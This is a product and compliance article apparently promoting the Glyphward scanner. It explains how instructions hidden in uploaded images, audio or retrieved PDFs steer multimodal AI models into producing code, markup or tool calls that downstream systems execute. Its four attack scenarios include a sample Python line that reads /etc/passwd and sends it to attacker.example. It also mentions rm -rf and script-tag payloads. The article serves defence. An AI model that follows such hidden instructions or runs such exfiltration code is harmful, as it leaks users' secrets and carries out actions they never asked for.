Compliance · OWASP LLM02:2025

OWASP LLM02:2025 Insecure Output Handling — the multimodal-origin attack chain

The standard OWASP LLM02:2025 (Insecure Output Handling) playbook begins with a user typing a malicious prompt. In a multimodal application, the prompt never has to be typed: an instruction hidden in an uploaded image or audio file reaches the vision or audio model, the model's output becomes the attack payload, and that payload flows into a downstream code interpreter, web renderer, or database without the output sanitizer ever seeing the root cause. This is the LLM01→LLM02 chain. An output-only control catches some harm at the end of the chain, but it cannot break the chain at the start. Here is what LLM02:2025 names, where multimodal inputs create LLM02 exposure that a text-only program misses, and the two-control architecture — input inspection and output sanitization — that closes both risks together.

TL;DR

LLM02:2025 (canonical risk page at the OWASP GenAI Security Project) covers the class of vulnerabilities where LLM-generated output is consumed by a downstream component — a code interpreter, a web renderer, an API, a shell — without sanitization or validation. In multimodal apps, the payload that reaches the downstream component can originate in an image or audio file rather than a typed prompt. A text-only output sanitizer sees the same poisoned code or markup either way; it does not know the taint came from pixels. Breaking the chain before the poisoned output is generated — by scanning the image or audio bytes before they reach the model — is the structural answer. Glyphward is the inference-time multimodal scanner that sits at that boundary and blocks the tainted input so no poisoned output is ever produced for a downstream component to execute.

What LLM02:2025 actually covers

LLM02:2025 takes its name from the class of downstream-execution vulnerabilities that exist when an application passes LLM output to another system without treating that output as untrusted. The 2025 revision of the OWASP Top 10 for LLM Applications identifies several categories of downstream harm:

Cross-site scripting (XSS). LLM output is rendered as HTML in a web interface. A user who can influence the model's output can inject JavaScript that executes in another user's browser. The attack is structurally identical to classic stored XSS — the novelty is that the storage mechanism is the model rather than a database.
Remote code execution (RCE). LLM output is executed as code — typically in a code-interpreter agent where the model generates Python, Bash, or JavaScript that a REPL then runs. An injected instruction in the model's context can redirect the generated code to read secrets, exfiltrate data, or modify files.
Server-side request forgery (SSRF). LLM output contains a URL that a downstream component fetches. An injected instruction can redirect that URL to an internal endpoint, a cloud metadata service, or an exfiltration target.
Privilege escalation via structured output. LLM output is parsed as JSON or XML and used to populate database queries, function calls, or API requests. An injected instruction can add fields, modify values, or escalate permissions inside the downstream system's data model.

The 2025 list names these scenarios because code-interpreter agents, agentic pipelines that render LLM output in web views, and structured-output-to-API patterns are now mainstream in production AI applications. The control the list calls for is sanitization and validation of every LLM output before it reaches a downstream executor — not trust that the model's output is safe because the model's input was user-supplied text.

Where multimodal inputs create LLM02 exposure

The standard LLM02 framing assumes the attack begins at the text input boundary: a user or an external source crafts a prompt that steers the model into producing harmful output. In multimodal applications, that assumption is wrong. The attack can begin at the image or audio boundary instead.

The chain works in two stages. Stage one is LLM01 multimodal: an instruction is hidden inside image pixels or an audio waveform — a FigStep-style adversarial-glyph overlay, an AgentTypo confusable-character block, a WhisperInject ultrasonic carrier, or an indirect image injected through a retrieved document (see FigStep detection, AgentTypo detector, WhisperInject detection, indirect prompt injection in images). The vision or audio model reads those bytes as part of the context and follows the embedded instruction. Stage two is LLM02: the model's output — now shaped by the injected instruction — flows to a downstream component that executes it. The downstream component is not the model; it is the code interpreter, the markdown renderer, the structured-output parser, or the API adapter downstream of the model.

What makes this chain dangerous for a standard LLM02 control program is that the output sanitizer observes the same output regardless of whether the taint came from a typed user prompt or from pixels in an uploaded image. The output sanitizer cannot close the chain at its root. It can catch some terminal harm — rejecting a generated rm -rf command before the shell runs it, stripping a <script> tag before the browser renders it — but it cannot prevent the model from having generated the payload in the first place. The only structural closure is at stage one: scan the image or audio bytes before they reach the model, so no poisoned output is ever produced for the downstream component to process.

Four multimodal-origin LLM02 attack scenarios

Four attack patterns recur in the multimodal LLM02 threat model across production application categories.

1. Code-interpreter agent with image input. The application lets users upload screenshots or charts for analysis; the model reads the image and then generates Python the code interpreter runs. A FigStep-style overlay on the uploaded image instructs the model to include a data-exfiltration line in its generated code — import urllib; urllib.request.urlopen('https://attacker.example/?' + open('/etc/passwd').read()). The user's visible output is a normal-looking analysis; the exfiltration runs silently in the REPL. An output sanitizer that validates generated Python can catch this specific form if it pattern-matches the exfiltration URL or the system-file path. But the model can generate an equivalent payload in a thousand syntactic variations, making signature-based output filtering an arms-race. Closing stage one — rejecting the FigStep-bearing image before it reaches the model — prevents the tainted Python from being generated at all. Per-product threat model in screenshot-reading agents, CrewAI agents, and AutoGen agents.

2. Multimodal chatbot with markdown rendering. The application renders LLM output as HTML in a chat interface. Users can upload images in conversation. An adversarial image instructs the model to output a markdown link that, when rendered, loads an attacker-controlled resource or triggers a JavaScript handler. Classic stored-XSS impact — session token theft, CSRF, UI redirection — delivered through the vision channel. An output sanitizer that strips <script> tags and enforces a content-security policy catches the terminal step for most delivery forms. But a sandboxed rendering environment plus output sanitization is a significantly more complex control to maintain than scanning the image at upload time. Per-product threat model in chatbots with image upload.

3. RAG pipeline with image-bearing PDFs. A document retrieval pipeline ingests PDFs and passes retrieved chunks to the model. A PDF with an embedded image carries a FigStep or indirect-injection payload — an instruction to include a specific URL in the model's synthesized answer, or to populate a structured-output field with an attacker-specified value. If the model's answer feeds a downstream API call or a database write, the injected field value executes with the application's permissions. An output sanitizer on the API call can validate schema conformance; but the schema is wide enough to admit a privilege-escalating value (a role override, a quota increase, an admin flag). Stage-one closure — scanning images extracted from PDFs at ingestion or retrieval time — prevents the poisoned chunk from ever reaching the model. Per-product threat model in RAG pipelines.

4. Voice agent with code generation or tool dispatch. The application transcribes audio, passes the transcript to an LLM, and uses the model's response to dispatch tool calls or generate configuration. A WhisperInject-class payload in the audio instructs the model to add a tool call not requested by the user — a calendar write to an attacker-controlled time slot, an API call to an exfiltration endpoint, a configuration change that persists across sessions. The transcript that reaches the text-side guard is clean (Whisper dropped the carrier); the model's output contains the injected tool call. Per-product threat model in voice agents; byte-level coverage in audio prompt-injection detection.

Why text output filters do not close the multimodal-origin chain

Three architectural facts explain why output sanitization is necessary but not sufficient for multimodal-origin LLM02.

Position in the pipeline. An output sanitizer sits after the model. It processes the model's response before a downstream component executes it. That position is correct and useful — it is the last line of defence before real harm occurs. But it cannot see why the model produced that particular output. A rm -rf command in generated code looks identical whether the model was steered there by a typed jailbreak, a FigStep overlay in an uploaded image, or an indirect injection in a retrieved PDF. The sanitizer treats all three the same. It catches the terminal form of the attack but cannot prevent the model from generating the next syntactic variant.

The OCR adapter problem. One mitigation for image inputs is to run OCR on every uploaded image and pass the OCR output through the text-side output sanitizer as if it were a text input. This does not close the multimodal-origin LLM02 chain for the same reason it does not close LLM01 multimodal: FigStep, AgentTypo, and the adversarial-glyph class are specifically designed to survive OCR. The pixels contain an instruction the vision model reads; the OCR transcript does not contain that instruction; the text-side filter sees nothing suspicious. See why every text-only scanner misses a 30-pixel PNG for the full architectural argument. The same structural ceiling applies when the OCR adapter is feeding an output filter rather than an input filter.

Indirect vectors skip text inspection entirely. In a RAG pipeline or an MCP-connected agent, the image or audio bytes arrive through a retrieval, a tool result, or an embedded resource — not through a direct user upload. The user's initial message may be benign and entirely clean on both text-side input and output filters. The taint enters through the non-text channel (see MCP servers and RAG pipelines). Neither the text-side input filter nor the text-side output filter has a chance to observe the payload before it reaches the model.

Coverage matrix — LLM02 multimodal evidence

For a buyer building an LLM02:2025 control program that accounts for multimodal-origin attack paths, the question is which tools address each layer. The table below separates input-side multimodal coverage (stage one — prevents poisoned output from being generated) from output-side sanitization (stage two — catches terminal harm before downstream execution).

Tool	Input-side multimodal scan	Output-side text sanitization	LLM02 multimodal-origin coverage
Lakera Guard	No (text-only input guard)	Yes (output scanner available)	Stage 2 only — multimodal-origin chain not broken at root
LLM Guard (OSS)	No (text-only by design)	Yes (output scanners in OSS library)	Stage 2 only — multimodal-origin chain not broken at root
Azure Prompt Shields	Image moderation, not PI	Yes (Azure Content Safety output filters)	Stage 2 only; image moderation ≠ PI detection on input
Promptfoo	Eval-time test harness	Eval-time test harness	Neither stage at inference time — CI/eval tool, not runtime control
Glyphward	Yes — image + audio bytes, inference-time	Not in scope (pair with text-side output filter)	Stage 1 — breaks the chain before poisoned output is generated

The operative takeaway is that Glyphward and a text-side output sanitizer are complements, not substitutes. LLM02 needs both: the multimodal input scanner closes the root-cause path, and the output sanitizer catches any residual harm that reaches the downstream boundary — whether from text-side injection or from a multimodal-origin payload that evaded the input scanner (e.g., a novel attack class not yet in the corpus). No single tool closes both stages unilaterally. The comparison detail is in Glyphward vs Lakera Guard, vs LLM Guard, vs Azure Prompt Shields, and vs Promptfoo.

The two-control architecture for LLM01+LLM02 compliance

Closing LLM02:2025 in a multimodal application requires two controls positioned at two different pipeline boundaries. Neither replaces the other; they address different stages of the same attack chain.

Stage-one: multimodal input inspection. Place the scanner on every boundary at which image or audio bytes enter the model's context — the upload handler before the vision API call, the audio buffer before the STT pipeline, the loader middleware before RAG ingestion, the tool-result handler before MCP content blocks reach the LLM host. Score each byte payload against the PI detection corpus. Reject or quarantine payloads above the threshold before they reach the model. This prevents any poisoned output from being generated; there is nothing for a downstream executor to receive. Per-framework mount points in LangChain, CrewAI, AutoGen, OpenAI Assistants API, RAG pipelines, and MCP servers.
Stage-two: output sanitization before downstream execution. Validate and sanitize every LLM output before passing it to a code interpreter, a web renderer, an API client, or a data store. This is the standard LLM02 control: treat the model's response as untrusted user input at every downstream boundary. For code execution, run the generated code through a static analyser or execute in a sandboxed environment with no network or filesystem access. For web rendering, enforce a strict CSP and strip all raw HTML from markdown output. For structured-output-to-API flows, validate the output against a tight schema that rejects unexpected fields and values. For database writes, use parameterised queries regardless of the LLM output's apparent structure.
Source-aware trust thresholds. Apply lower scan thresholds for content that arrives from less-trusted sources — third-party tool results, public-web retrievals, community-contributed documents. The same image byte stream from a first-party internal document warrants a different risk posture than the same bytes arriving from an untrusted URL in an MCP server's tool response. Source-aware thresholds let the control program express this risk tier without blocking first-party content unnecessarily.
Per-request scoring for evidence. Both controls should produce per-request evidence: the multimodal scanner returns a request ID and a 0–100 score; the output sanitizer logs every rejection and the downstream component it protected. LLM02:2025 audit evidence is a claim about pipeline integrity across all execution paths — not just the happy path — and per-request logs are the only way to demonstrate coverage at scale. The OWASP LLM01 and LLM02 evidence questions are typically asked together in an audit; the combined log answers both from a single evidence trail.
Ongoing testing. Add multimodal PI payloads to your CI eval suite (see Promptfoo + multimodal scanning). A red-team run against each modality the application accepts — direct image upload, audio input, and every indirect channel — verifies that the stage-one scanner is catching the current corpus and that the stage-two sanitizer is rejecting the outputs it produces when the scanner is disabled. Running both stages in isolation and together gives you four test configurations; the failure modes of each combination map directly onto the OWASP LLM02 evidence question structure.

How Glyphward closes stage one

Glyphward is the inference-time multimodal scanner — bytes in, 0–100 score and flagged region out — that sits at the stage-one boundary described above. The HTTP contract is one POST per attachment: image bytes or URL, or audio bytes; the response is a score, the flagged region (bounding box for images, time window for audio), the modality-tagged reason, and a request ID. The scanner runs CLIP embedding plus a typographic-PI detection head plus Tesseract OCR cross-referenced against a curated payload corpus on the image side, and a waveform anomaly classifier plus Whisper-small transcript filter on the audio side. Full architecture in the multimodal prompt-injection threat model for AI product teams (2026).

For an LLM02:2025 audit the scanner addresses the multimodal-origin gap: the stage-one scores, request IDs, and flagged-region reasons constitute the evidence that multimodal inputs are inspected before they reach any model that produces downstream-executed output. That evidence answers the implicit question behind every LLM02 audit item — "what controls prevent the model from generating a harmful payload from a non-text input?" — in the same way the text-side input guard answers the same question for text inputs.

Glyphward does not replace an output sanitizer — it pairs with one. The OWASP LLM01:2025 multimodal coverage page covers the input-side control in detail. The output-side control belongs to the same text-PI vendor family (Lakera, LLM Guard, Azure) most teams already use for text inputs; Glyphward is the missing half, not a replacement for the half that already exists. Pricing is flat-rate self-serve at $29/mo Pro and $99/mo Team, with a free tier for prototyping via the free-tier API.

Get early access · See the API surface